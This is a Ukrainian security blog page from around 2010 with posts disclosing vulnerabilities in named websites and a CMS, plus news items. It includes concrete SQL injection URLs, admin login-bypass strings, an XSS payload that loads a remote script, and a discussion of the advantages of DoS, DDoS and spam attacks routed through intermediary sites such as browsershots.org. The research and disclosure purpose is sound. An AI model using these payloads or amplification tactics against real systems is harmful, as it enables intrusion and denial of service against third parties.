Websecurity - Веб безпека

20.02.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливість на сайті http://www.bandofwarriors.org. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

28.09.2010

SQL Injection:

http://www.bandofwarriors.org/mpn/print.php?sid=-1%20or%20version()=3.23

Уразливість досі не виправлена.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://volleyball.org.ua - інфекція була виявлена 22.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 7 разів протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://pallada.kherson.ua - інфекція була виявлена 17.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 4 рази протягом останніх 90 днів. Зараз сайт не входить до переліку підозрілих.
• http://pallada.ks.ua - інфекція була виявлена 14.09.2010. Частина цього сайта була внесена до переліку сайтів із підозрілою активністю 3 рази протягом останніх 90 днів. Зараз сайт входить до переліку підозрілих.
• http://dpa.kharkov.ua - інфікований державний сайт - інфекція була виявлена 25.09.2010. Зараз сайт не входить до переліку підозрілих.
• http://mybigcash.com - інфекція була виявлена 24.07.2010. Зараз сайт не входить до переліку підозрілих.

Виявлені численні уразливості безпеки в PHP.

Уразливі версії: PHP 5.2, PHP 5.3.

Витік інформації через phar, витік інформації через SPLObjectStorage, витік інформації через повідомлення про помилку, підміна змінних.

• PHP vulnerabilities (деталі)

08.02.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливості на сайті http://www.vilmorin.com.au (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на rozetka.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.09.2010

SQL Injection (Auth Bypass):

На сторінці http://www.vilmorin.com.au/admin/

admin’ or 1=’1
В полі username.

‘ or ‘1′=’1
В полі password.

Зараз сайт не працює. Схоже, що замість виправлення дірок, власники сайта вірішили його закрити.

Є такий цікавий сервіс як browsershots.org, який дозволяє проводити перевірки сумісності веб сайтів з браузерами. Всього доступна первірка в 77 браузерах на 4 платформах (Linux, Windows, Mac та BSD). І даний сервіс може використовуватися для проведення атак на інші сайти.

В серпні, 15.08.2010, я знайшов Abuse of Functionality та Insufficient Anti-automation на сайті http://browsershots.org. Про що найближчим часом сповіщу адміністрацію сайта.

Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

Abuse of Functionality:

На сторінці http://browsershots.org в полі URL.

Даний функціонал може використовуватися для атаки на інші сайти. А також для проведення DoS атаки на сам сервіс. Враховуючи те, що один запит до даного сервісу (з метою атаки на інший сайт) призводить до 77 запитів до цільового сайта, це значно посилює кожну атаку.

Insufficient Anti-automation:

В даному функціоналі немає захисту від автоматизованих запитів (капчі).

P.S.

В 2013 році в сервісі вже 158 різних браузерів, що призводить до 158 запитів до цільового сайта.

Про переваги атак на сайти з використанням інших сайтів я вже коротко писав в статті Використання сайтів для атак на інші сайти. А також розробив програму DAVOSET для проведення таких атак. Зараз більш детально розповів про переваги використанням інших сайтів для проведення DoS і DDoS атак та для розсилки спаму.

При проведенні DoS атак через інші сайти є наступні переваги:

• Використання ресурсів інших серверів для атаки.
• Приховання джерела атаки (за рахунок приховання власного IP).
• Обхід обмежень на IP при атаці на сайт (за рахунок використання інших серверів).
• Підставлення сайтів, що використовувалися для проведення атаки.
• Використання трафіку інших серверів.
• Можна заDoSити як цільовий сайт, так і сайт-посередник, так і обидва сайти.

При проведенні DDoS атак через інші сайти є наступні переваги:

• Використання ресурсів інших серверів.
• Приховання джерела атаки (за рахунок приховання власного IP).
• Обхід обмежень на IP при атаці на сайт (за рахунок використання інших серверів).
• Підставлення сайтів, що використовувалися для проведення атаки.
• Використання багатьох серверів, що посилить атаку.
• Використання трафіку інших серверів.

При розсилці спаму через інші сайти є наступні переваги:

• Використання ресурсів інших серверів.
• Приховання джерела розсилки спаму (за рахунок приховання власного IP).
• Підставлення сайтів, що використовувалися для розсилки спаму.
• Використання трафіку інших серверів.

З вищенаведеного видно, що у даних атак є чимало переваг і тому з часом вони будуть все більше використовуватися. І тому потрібно виправляти уразливості, що дозволяють використовувати ваші сайти для атак на інші сайти.

Виявлена можливість міжсайтового доступу в Opera.

Уразливі версії: Opera 10.62.

Міжсайтовий скриптінг через @import url().

• Opera Web Browser v10.62 (CSS) Cross Domain Vulnerability (деталі)

29.06.2010

У листопаді, 20.11.2009, я знайшов Full path disclosure, Cross-Site Scripting та SQL Injection уразливості в CMS MYsite (це українська комерційна CMS). Які я виявив на lookmy.info - сайті розробників системи. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

25.09.2010

Full path disclosure:

http://site/portal/modules.php?name=Ads

XSS:

http://site/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

SQL Injection:

http://site/print.php?id=1&pid=-1%20or%201=1

CMS MYsite зроблена на основі PHP-Nuke, тому SQL Injection подібна до уразливості, що я знаходив в PHP-Nuke та його клонах декілька років тому. В даній CMS можуть бути й інші дірки PHP-Nuke.

Дані уразливості вже виправлені розробником після мого повідомлення (як мінімум в себе на сайті). Але зазначу, що хоча XSS виправлена, але не якісно, тому при виключених mq на сайті (це потрібно для використання лапок) можна провести XSS атаку (для виконання коду або редирекції на інші сайти), зокрема з використанням MouseOverJacking.

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням hackzona.com.ua, американець вкрав $11 тис. за допомогою одного телефонного дзвінка.

Житель штату Огайо обікрав американського рітейлера Wal-Mart на $11000 за допомогою навичок соціальної інженерії. Близько години ночі в неділю, п’ятого вересня, чоловік подзвонив на цілодобову лінію магазину Wal-Mart в місті Колумбус і зумів переконати оператора активувати декілька платіжних карт і сказати йому активаційні коди. Повідомляється, що зловмисник завдав магазину збиток в розмірі понад $11000.

За повідомленням www.cio-world.ru, у Москві ліквідована група хакерів. Відділ “К” і УБЕЗ РУВС м. Москви ліквідували злочинну групу хакерів, що заражали вірусами-блокаторами персональні комп’ютери користувачів мережі Інтернет.

Члени групи хакерів брали участь у розробці і поширенні вірусів блокаторів, що заражали персональні комп’ютери при відвідуванні ряду різних сайтів. Вірус цілком блокував роботу персонального комп’ютера, а на моніторі користувача з’являлася порнографічна картинка і повідомлення, у якому говорилося, що для розблокування комп’ютера необхідний пароль, що користувач міг одержати, відіславши платне SMS-повідомлення на чотиризначний номер.

Від дій хакерів постраждали десятки тисяч користувачів Інтернету не тільки в Росії, але і на Україні, у Білорусії, Молдавії і країнах Балтії. Зловмисники діяли біля року і, по оцінках співробітників міліції, одержали незаконний доход більше 500 млн. рублів.

За повідомленням hackzona.com.ua, NSS Labs запустить онлайн ринок експлоітів.

Компанія NSS Labs, яка спеціалізується на тестуванні продуктів безпеки, збирається запустити онлайновий ринок експлоітів в наступному місяці. Сервіс Exploit Hub надасть дослідникам безпеки можливість продавати коди експлоітів для відомих уразливостей.

Виявлені численні уразливості безпеки в Apple WebKit і Safari.

Уразливі версії: Apple Safari 4.1, Safari 5.0.

Виконання коду, пошкодження пам’яті.

• Apple Safari Webkit Runin Remote Code Execution Vulnerability (деталі)
• About the security content of Safari 5.0.2 and Safari 4.1.2 (деталі)